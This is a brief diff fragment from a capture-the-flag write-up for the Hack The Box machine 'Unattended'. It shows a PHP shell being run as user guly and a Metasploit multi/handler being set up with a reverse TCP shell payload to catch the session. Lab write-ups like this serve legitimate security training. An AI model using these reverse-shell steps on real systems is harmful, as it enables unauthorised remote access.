varjo/writeups/htb/unattended/Unattended.md

 guly@unattended:/tmp$ php shell.php
 ```

-Setting up a new meterpreter session we immediately see our new session
+Setting up a new meterpreter session we immediately see our `guly` session:
 ```
 msf6 > use exploit/multi/handler
 [*] Using configured payload generic/shell_reverse_tcp